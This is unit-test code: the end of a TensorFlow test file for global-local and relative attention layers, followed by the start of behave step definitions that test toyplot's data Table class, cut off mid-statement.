long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=5,
local_radius=7,
relative_vocab_size=9,
share_kv_projections=share_kv_projections,
share_qkv_projections=share_qkv_projections,
share_att_output_projection=share_att_output_projection)
# Run layer to make sure all variables are built.
layer(
long_input=tf.ones([1, 1, hidden_size]),
global_input=tf.ones([1, 1, hidden_size]))
if share_qkv_projections:
self.assertIs(layer.long_query_projection, layer.global_query_projection)
self.assert_all_identical(layer.l2l_key_projection,
layer.l2g_key_projection,
layer.g2g_key_projection,
layer.g2l_key_projection)
self.assert_all_identical(layer.l2l_value_projection,
layer.l2g_value_projection,
layer.g2g_value_projection,
layer.g2l_value_projection)
elif share_kv_projections:
self.assertIsNot(layer.long_query_projection,
layer.global_query_projection)
self.assertIs(layer.l2l_key_projection, layer.l2g_key_projection)
self.assertIs(layer.g2g_key_projection, layer.g2l_key_projection)
self.assertIsNot(layer.l2l_key_projection, layer.g2g_key_projection)
self.assertIs(layer.l2l_value_projection, layer.l2g_value_projection)
self.assertIs(layer.g2g_value_projection, layer.g2l_value_projection)
self.assertIsNot(layer.l2l_value_projection, layer.g2g_value_projection)
else:
self.assertIsNot(layer.long_query_projection,
layer.global_query_projection)
self.assertIsNot(layer.l2l_key_projection, layer.l2g_key_projection)
self.assertIsNot(layer.l2l_key_projection, layer.g2g_key_projection)
self.assertIsNot(layer.l2l_value_projection, layer.l2g_value_projection)
self.assertIsNot(layer.l2l_value_projection, layer.g2g_value_projection)
self.assertIsNot(layer.long_query_projection, layer.l2l_key_projection)
self.assertIsNot(layer.long_query_projection, layer.l2l_value_projection)
self.assertIsNot(layer.l2l_key_projection, layer.l2l_value_projection)
if share_att_output_projection:
self.assertIs(layer.long_output_projection,
layer.global_output_projection)
else:
self.assertIsNot(layer.long_output_projection,
layer.global_output_projection)
def test_fused_global_local_attention_custom_total_att_size(self):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_seq_len = 12
global_seq_len = 6
hidden_size = 11
num_heads = 5
local_radius = 2
total_att_size = 10
relative_vocab_size = 9
long_input = tf.constant(
np.random.normal(size=[batch_size, long_seq_len, hidden_size]))
global_input = tf.constant(
np.random.normal(size=[batch_size, global_seq_len, hidden_size]))
l2l_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_seq_len, 2 * local_radius + 1]))
g2g_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, global_seq_len, global_seq_len]))
l2g_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_seq_len, global_seq_len]))
g2l_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, global_seq_len, long_seq_len]))
l2l_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_seq_len, 2 * local_radius + 1]))
g2g_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, global_seq_len, global_seq_len]))
l2g_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_seq_len, global_seq_len]))
g2l_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, global_seq_len, long_seq_len]))
fused_att_layer = etc_layers.FusedGlobalLocalAttention(
long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=num_heads,
local_radius=local_radius,
long_total_att_size=total_att_size,
global_total_att_size=total_att_size,
relative_vocab_size=relative_vocab_size,
share_qkv_projections=True,
share_att_output_projection=True)
long_output, global_output = fused_att_layer(
long_input,
global_input,
l2l_att_mask=l2l_att_mask,
g2g_att_mask=g2g_att_mask,
l2g_att_mask=l2g_att_mask,
g2l_att_mask=g2l_att_mask,
l2l_relative_att_ids=l2l_relative_att_ids,
g2g_relative_att_ids=g2g_relative_att_ids,
l2g_relative_att_ids=l2g_relative_att_ids,
g2l_relative_att_ids=g2l_relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual([batch_size, long_seq_len, hidden_size],
long_output.shape)
self.assertAllEqual([batch_size, global_seq_len, hidden_size],
global_output.shape)
def test_attention_head_projection(self):
inputs = tf.ones([2, 3, 10])
layer = etc_layers.ProjectAttentionHeads(num_heads=4, size_per_head=5)
result = layer(inputs)
self.assertAllEqual([2, 3, 4, 5], result.shape)
inputs = tf.ones([2, 3, 4, 10])
layer = etc_layers.ProjectAttentionHeads(num_heads=5, size_per_head=6)
result = layer(inputs)
self.assertAllEqual([2, 3, 4, 5, 6], result.shape)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_qkv_relative_attention(self, use_one_hot_lookup):
# batch_size: 2
# query_len: 3
# key_len: 4
# num_heads: 2
# key_size_per_head: 3
# value_size_per_head: 5
# relative_vocab_size: 6
# [batch_size, query_len, num_heads, key_size_per_head]
queries = tf.constant([
[
[[1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
[[0.0, 1.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]],
], #
[
[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]],
[[1.0, 1.0, 0.0], [1.0, 1.0, 0.0]],
[[1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
]
])
# [batch_size, key_len, num_heads, key_size_per_head]
keys = tf.constant([
[
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[99.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[0.0, 0.0, 99.0], [0.0, 0.0, -99.0]],
[[0.0, 99.0, 0.0], [0.0, -99.0, 0.0]],
], #
[
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[99.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[0.0, 99.0, 0.0], [0.0, -99.0, 0.0]],
[[0.0, 0.0, 99.0], [0.0, 0.0, -99.0]],
]
])
# [batch_size, key_len, num_heads, value_size_per_head]
values = tf.constant([
[
[[0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, -0.1]],
[[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, -0.2]],
[[0.3, 0.3, 0.3, 0.3, 0.3], [0.3, 0.3, 0.3, 0.3, -0.3]],
[[0.4, 0.4, 0.4, 0.4, 0.4], [0.4, 0.4, 0.4, 0.4, -0.4]],
], #
[
[[-0.1, 0.1, 0.1, 0.1, 0.1], [-0.1, 0.1, 0.1, 0.1, -0.1]],
[[-0.2, 0.2, 0.2, 0.2, 0.2], [-0.2, 0.2, 0.2, 0.2, -0.2]],
[[-0.3, 0.3, 0.3, 0.3, 0.3], [-0.3, 0.3, 0.3, 0.3, -0.3]],
[[-0.4, 0.4, 0.4, 0.4, 0.4], [-0.4, 0.4, 0.4, 0.4, -0.4]],
]
])
# [batch_size, query_len, key_len]
att_mask = tf.constant([
[
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
],
[
[1, 0, 1, 1],
[1, 0, 1, 1],
[1, 0, 1, 1],
],
])
# [batch_size, query_len, key_len]
relative_att_ids = tf.constant([
[
[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 5],
],
[
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 2, 2],
],
])
# [relative_vocab_size, num_heads, key_size_per_head]
relative_emb_table = [
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[-99.0, 0.0, 0.0], [99.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, -99.0]],
]
layer = etc_layers.QkvRelativeAttention(
relative_vocab_size=6,
use_one_hot_lookup=use_one_hot_lookup,
initializer=tf.initializers.constant(relative_emb_table))
result = layer(
queries=queries,
keys=keys,
values=values,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
expected = [
[
[[0.2, 0.2, 0.2, 0.2, 0.2], [0.35, 0.35, 0.35, 0.35, -0.35]],
[[0.4, 0.4, 0.4, 0.4, 0.4], [0.2, 0.2, 0.2, 0.2, -0.2]],
[[0.3, 0.3, 0.3, 0.3, 0.3], [0.15, 0.15, 0.15, 0.15, -0.15]],
], #
[
[[-0.35, 0.35, 0.35, 0.35, 0.35], [-0.1, 0.1, 0.1, 0.1, -0.1]],
[[-0.3, 0.3, 0.3, 0.3, 0.3], [-0.25, 0.25, 0.25, 0.25, -0.25]],
[[-0.1, 0.1, 0.1, 0.1, 0.1], [-0.35, 0.35, 0.35, 0.35, -0.35]],
]
]
self.assertAllEqual([2, 3, 2, 5], result.shape)
self.assertAllClose(expected, result)
@parameterized.named_parameters(
dict(testcase_name='even_blocking_with_gather', local_radius=15),
dict(testcase_name='uneven_blocking_with_gather', local_radius=16),
dict(testcase_name='degenerate_blocking_with_gather', local_radius=35),
dict(
testcase_name='even_blocking_with_one_hot',
local_radius=15,
use_one_hot_lookup=True),
dict(
testcase_name='uneven_blocking_with_one_hot',
local_radius=16,
use_one_hot_lookup=True),
dict(
testcase_name='degenerate_blocking_with_one_hot',
local_radius=35,
use_one_hot_lookup=True),
dict(
testcase_name='even_blocking_with_gather_full_att',
local_radius=15,
att_implementation='full'),
dict(
testcase_name='uneven_blocking_with_gather_full_att',
local_radius=16,
att_implementation='full'),
dict(
testcase_name='degenerate_blocking_with_gather_full_att',
local_radius=35,
att_implementation='full'),
dict(
testcase_name='even_blocking_with_one_hot_full_att',
local_radius=15,
use_one_hot_lookup=True,
att_implementation='full'),
dict(
testcase_name='uneven_blocking_with_one_hot_full_att',
local_radius=16,
use_one_hot_lookup=True,
att_implementation='full'),
dict(
testcase_name='degenerate_blocking_with_one_hot_full_att',
local_radius=35,
use_one_hot_lookup=True,
att_implementation='full'),
)
def test_qkv_relative_local_attention(self,
local_radius,
use_one_hot_lookup=False,
att_implementation='sparse'):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 2
long_len = 64
side_len = 6
num_heads = 5
key_size_per_head = 2
value_size_per_head = 3
relative_vocab_size = 7
# Note: block_len = local_radius + 1
queries = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
keys = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
values = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, value_size_per_head]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_len, 2 * local_radius + 1]))
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_len, 2 * local_radius + 1]))
side_keys = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, key_size_per_head]),
tf.float32)
side_values = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, value_size_per_head]),
tf.float32)
side_att_mask = tf.constant(
np.random.binomial(n=1, p=0.9, size=[batch_size, long_len, side_len]))
side_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, long_len, side_len]))
layer = etc_layers.QkvRelativeLocalAttention(
local_radius=local_radius,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result1.shape)
result2 = layer(
queries,
keys,
values,
att_mask=None,
relative_att_ids=None,
side_keys=side_keys,
side_values=side_values,
side_att_mask=None,
side_relative_att_ids=None,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result2.shape)
result3 = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=None,
side_values=None,
side_att_mask=None,
side_relative_att_ids=None,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result3.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertNotAllClose(result1, result2)
self.assertNotAllClose(result2, result3)
self.assertNotAllClose(result1, result3)
@parameterized.named_parameters(
('even_blocking_with_gather', 15, False),
('uneven_blocking_with_gather', 16, False),
('degenerate_blocking_with_gather', 35, False),
('even_blocking_with_one_hot', 15, True),
('uneven_blocking_with_one_hot', 16, True),
('degenerate_blocking_with_one_hot', 35, True),
)
def test_qkv_relative_local_attention_full_att_implementation(
self, local_radius, use_one_hot_lookup):
# We check the validity of the `att_implementation` option
# by confirming both internal implementations return the same output.
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_len = 64
side_len = 6
num_heads = 5
key_size_per_head = 2
value_size_per_head = 3
relative_vocab_size = 7
# Note: block_len = local_radius + 1
queries = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
keys = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
values = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, value_size_per_head]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.8, size=[batch_size, long_len, 2 * local_radius + 1]),
dtype=tf.int32)
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_len, 2 * local_radius + 1]),
dtype=tf.int32)
side_keys = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, key_size_per_head]),
tf.float32)
side_values = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, value_size_per_head]),
tf.float32)
side_att_mask = tf.constant(
np.random.binomial(n=1, p=0.8, size=[batch_size, long_len, side_len]),
dtype=tf.int32)
side_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, long_len, side_len]),
dtype=tf.int32)
layer = etc_layers.QkvRelativeLocalAttention(
local_radius=local_radius,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
sparse_implementation_result = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation='sparse')
full_implementation_result = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation='full')
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllClose(sparse_implementation_result,
full_implementation_result)
class HelpersTest(tf.test.TestCase):
def test_expand_local_ids_to_blocks_with_even_blocking(self):
# batch_size = 2
# seq_len = 6
# local_radius = 1
# block_len = 2
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9], #
[10, 11, 12], #
[13, 14, 15], #
[16, 17, 18], #
], #
[
[-1, -2, -3], #
[-4, -5, -6], #
[-7, -8, -9], #
[-10, -11, -12], #
[-13, -14, -15], #
[-16, -17, -18], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 2, 3, 0, 0], #
[0, 0, 4, 5, 6, 0], #
], #
[
[0, 7, 8, 9, 0, 0], #
[0, 0, 10, 11, 12, 0], #
], #
[
[0, 13, 14, 15, 0, 0], #
[0, 0, 16, 17, 18, 0], #
]
], #
[
[
[0, -1, -2, -3, 0, 0], #
[0, 0, -4, -5, -6, 0], #
], #
[
[0, -7, -8, -9, 0, 0], #
[0, 0, -10, -11, -12, 0], #
], #
[
[0, -13, -14, -15, 0, 0], #
[0, 0, -16, -17, -18, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 2, 3, 0, 0], #
[0, 0, 4, 5, 6, 0], #
], #
[
[0, 7, 8, 9, 0, 0], #
[0, 0, 10, 11, 12, 0], #
], #
[
[0, 13, 14, 15, 0, 0], #
[0, 0, 16, 17, 0, 0], #
]
], #
[
[
[0, 0, -2, -3, 0, 0], #
[0, 0, -4, -5, -6, 0], #
], #
[
[0, -7, -8, -9, 0, 0], #
[0, 0, -10, -11, -12, 0], #
], #
[
[0, -13, -14, -15, 0, 0], #
[0, 0, -16, -17, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_uneven_blocking(self):
# batch_size = 2
# seq_len = 5
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3, 4, 5], #
[6, 7, 8, 9, 10], #
[11, 12, 13, 14, 15], #
[16, 17, 18, 19, 20], #
[21, 22, 23, 24, 25], #
], #
[
[-1, -2, -3, -4, -5], #
[-6, -7, -8, -9, -10], #
[-11, -12, -13, -14, -15], #
[-16, -17, -18, -19, -20], #
[-21, -22, -23, -24, -25], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 2, 3, 4, 5, 0, 0, 0], #
[0, 0, 6, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 11, 12, 13, 14, 15, 0], #
], #
[
[0, 16, 17, 18, 19, 20, 0, 0, 0], #
[0, 0, 21, 22, 23, 24, 25, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
[
[
[0, -1, -2, -3, -4, -5, 0, 0, 0], #
[0, 0, -6, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, -11, -12, -13, -14, -15, 0], #
], #
[
[0, -16, -17, -18, -19, -20, 0, 0, 0], #
[0, 0, -21, -22, -23, -24, -25, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 0, 3, 4, 5, 0, 0, 0], #
[0, 0, 0, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 11, 12, 13, 14, 15, 0], #
], #
[
[0, 16, 17, 18, 19, 0, 0, 0, 0], #
[0, 0, 21, 22, 23, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
[
[
[0, 0, 0, -3, -4, -5, 0, 0, 0], #
[0, 0, 0, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, -11, -12, -13, -14, -15, 0], #
], #
[
[0, -16, -17, -18, -19, 0, 0, 0, 0], #
[0, 0, -21, -22, -23, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_uneven_blocking_ones_mask(self):
# batch_size = 1
# seq_len = 7
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
], #
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 0, 1, 1, 1, 0, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 0, 0], #
], #
[
[0, 1, 1, 1, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
], #
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_degenerate_blocking(self):
# batch_size = 2
# seq_len = 2
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3, 4, 5], #
[6, 7, 8, 9, 10], #
], #
[
[-1, -2, -3, -4, -5], #
[-6, -7, -8, -9, -10], #
], #
])
self.assertAllEqual(
[
[ #
[
[0, 1, 2, 3, 4, 5, 0, 0, 0], #
[0, 0, 6, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
[ #
[
[0, -1, -2, -3, -4, -5, 0, 0, 0], #
[0, 0, -6, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[ #
[
[0, 0, 0, 3, 4, 0, 0, 0, 0], #
[0, 0, 0, 7, 8, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
[ #
[
[0, 0, 0, -3, -4, 0, 0, 0, 0], #
[0, 0, 0, -7, -8, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
],
attention._expand_local_ids_to_blocks(local_ids))
if __name__ == '__main__':
tf.test.main()
|
features/steps/data-table.py | eaton-lab/toyplot | 438 | 12716629 | <filename>features/steps/data-table.py
# Copyright 2014, Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains certain
# rights in this software.
from behave import *
import nose.tools
import numpy.testing
import collections
import io
import numpy
import os
import sys
import tempfile
import toyplot.data
import testing
try:
import pandas
except:
pass
def pandas_available(context):
if "pandas" in sys.modules:
return True
context.scenario.skip(reason="The pandas library is not available.")
return False
root_dir = os.path.dirname(os.path.dirname(__file__))
@given(u'a new toyplot.data.table')
def step_impl(context):
context.data = toyplot.data.Table()
@then(u'the table should be empty')
def step_impl(context):
nose.tools.assert_equal(len(context.data), 0)
nose.tools.assert_equal(context.data.shape, (0, 0))
nose.tools.assert_equal(list(context.data.items()), [])
nose.tools.assert_equal(list(context.data.keys()), [])
nose.tools.assert_equal(list(context.data.values()), [])
@then(u'adding columns should change the table')
def step_impl(context):
context.data["a"] = numpy.arange(10)
nose.tools.assert_equal(list(context.data.keys()), ["a"])
nose.tools.assert_equal(context.data.shape, (10, 1))
context.data["b"] = context.data["a"] ** 2
nose.tools.assert_equal(list(context.data.keys()), ["a", "b"])
nose.tools.assert_equal(context.data.shape, (10, 2))
context.data["c"] = numpy.zeros(10)
nose.tools.assert_equal(list(context.data.keys()), ["a", "b", "c"])
nose.tools.assert_equal(context.data.shape, (10, 3))
@then(u'columns can be retrieved by name')
def step_impl(context):
numpy.testing.assert_array_equal(context.data["a"], numpy.arange(10))
@then(u'partial columns can be retrieved by name and index')
def step_impl(context):
nose.tools.assert_equal(context.data["a", 5], 5)
@then(u'partial columns can be retrieved by name and slice')
def step_impl(context):
numpy.testing.assert_array_equal(context.data["a", 5:7], [5, 6])
@then(u'partial tables can be retrieved by row index')
def step_impl(context):
table = context.data[5]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (1, 3))
numpy.testing.assert_array_equal(table["a"], [5])
@then(u'partial tables can be retrieved by row slice')
def step_impl(context):
table = context.data[5:7]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (2, 3))
numpy.testing.assert_array_equal(table["a"], [5,6])
@then(u'partial tables can be retrieved by row index and column name')
def step_impl(context):
table = context.data[5, "b"]
nose.tools.assert_equal(list(table.keys()), ["b"])
nose.tools.assert_equal(table.shape, (1, 1))
numpy.testing.assert_array_equal(table["b"], [25])
@then(u'partial tables can be retrieved by row slice and column name')
def step_impl(context):
table = context.data[5:7, "b"]
nose.tools.assert_equal(list(table.keys()), ["b"])
nose.tools.assert_equal(table.shape, (2, 1))
numpy.testing.assert_array_equal(table["b"], [25,36])
@then(u'partial tables can be retrieved by row index and column names')
def step_impl(context):
table = context.data[5, ["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (1, 2))
numpy.testing.assert_array_equal(table["a"], [5])
@then(u'partial tables can be retrieved by row slice and column names')
def step_impl(context):
table = context.data[5:7, ["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (2, 2))
numpy.testing.assert_array_equal(table["a"], [5,6])
@then(u'partial tables can be retrieved by column names')
def step_impl(context):
table = context.data[["b", "a"]]
nose.tools.assert_equal(list(table.keys()), ["b", "a"])
nose.tools.assert_equal(table.shape, (10, 2))
@then(u'partial tables can be retrieved by row indices')
def step_impl(context):
table = context.data[[5, 7]]
nose.tools.assert_equal(list(table.keys()), ["a", "b", "c"])
nose.tools.assert_equal(table.shape, (2, 3))
numpy.testing.assert_array_equal(table["a"], [5, 7])
@then(u'columns can be replaced by name')
def step_impl(context):
context.data["c"] = numpy.ones(10)
nose.tools.assert_equal(list(context.data.keys()), ["a", "b", "c"])
nose.tools.assert_equal(context.data.shape, (10, 3))
numpy.testing.assert_array_equal(context.data["c"], [1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and separate index')
def step_impl(context):
context.data["c"][0] = 0
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 1, 1, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and separate slice')
def step_impl(context):
context.data["c"][1:4] = [1, 2, 3]
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 1, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and index')
def step_impl(context):
context.data["c", 4] = 4
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 4, 1, 1, 1, 1, 1])
@then(u'partial columns can be modified by name and slice')
def step_impl(context):
context.data["c", 5:8] = [5, 6, 7]
numpy.testing.assert_array_equal(context.data["c"], [0, 1, 2, 3, 4, 5, 6, 7, 1, 1])
@then(u'partial columns can be masked by name and index')
def step_impl(context):
context.data["c", 3] = numpy.ma.masked
nose.tools.assert_is(context.data["c"][3], numpy.ma.masked)
@then(u'partial columns can be masked by name and slice')
def step_impl(context):
context.data["c", 8:10] = numpy.ma.masked
nose.tools.assert_is(context.data["c"][8], numpy.ma.masked)
nose.tools.assert_is(context.data["c"][9], numpy.ma.masked)
@then(u'deleting columns should change the table')
def step_impl(context):
del context.data["c"]
nose.tools.assert_equal(list(context.data.keys()), ["a", "b"])
nose.tools.assert_equal(context.data.shape, (10, 2))
@then(u'new columns must have a string name')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data[3] = numpy.arange(10)
@then(u'new columns must have the same number of rows as existing columns')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data["c"] = numpy.random.random(4)
@then(u'new columns must be one-dimensional')
def step_impl(context):
with nose.tools.assert_raises(ValueError):
context.data["c"] = numpy.random.random((10, 4))
@then(u'per-column metadata can be specified')
def step_impl(context):
nose.tools.assert_equal(context.data.metadata("b"), {})
context.data.metadata("b")["foo"] = True
nose.tools.assert_equal(context.data.metadata("b"), {"foo": True})
with nose.tools.assert_raises(ValueError):
context.data.metadata("c")
@then(u'the table can be converted to a numpy matrix')
def step_impl(context):
matrix = context.data.matrix()
numpy.testing.assert_array_equal(matrix, [[0,0],[1,1],[2,4],[3,9],[4,16],[5,25],[6,36],[7,49],[8,64],[9,81]])
@when(u'toyplot.data.Table is initialized with nothing')
def step_impl(context):
context.data = toyplot.data.Table()
@then(u'the toyplot.data.Table is empty')
def step_impl(context):
nose.tools.assert_equal(len(context.data), 0)
nose.tools.assert_equal(context.data.shape, (0, 0))
nose.tools.assert_equal(list(context.data.items()), [])
nose.tools.assert_equal(list(context.data.keys()), [])
nose.tools.assert_equal(list(context.data.values()), [])
@when(u'toyplot.data.Table is initialized with a toyplot.data.Table')
def step_impl(context):
table = toyplot.data.Table()
table["a"] = numpy.arange(10)
table["b"] = table["a"] ** 2
context.data = table
@when(
u'toyplot.data.Table is initialized with an OrderedDict containing columns')
def step_impl(context):
context.data = collections.OrderedDict(
[("a", numpy.arange(10)), ("b", numpy.arange(10) ** 2)])
@then(u'the toyplot.data.Table contains the columns')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["a", "b"])
numpy.testing.assert_array_equal(
table["a"], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
numpy.testing.assert_array_equal(
table["b"], [0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
@when(u'toyplot.data.Table is initialized with a dict containing columns')
def step_impl(context):
context.data = {"b": numpy.arange(10) ** 2, "a": numpy.arange(10)}
@then(u'the toyplot.data.Table contains the columns, sorted by key')
def step_impl(context):
table = toyplot.data.Table(context.data)
nose.tools.assert_equal(list(table.keys()), ["a", "b"])
numpy.testing.assert_array_equal(
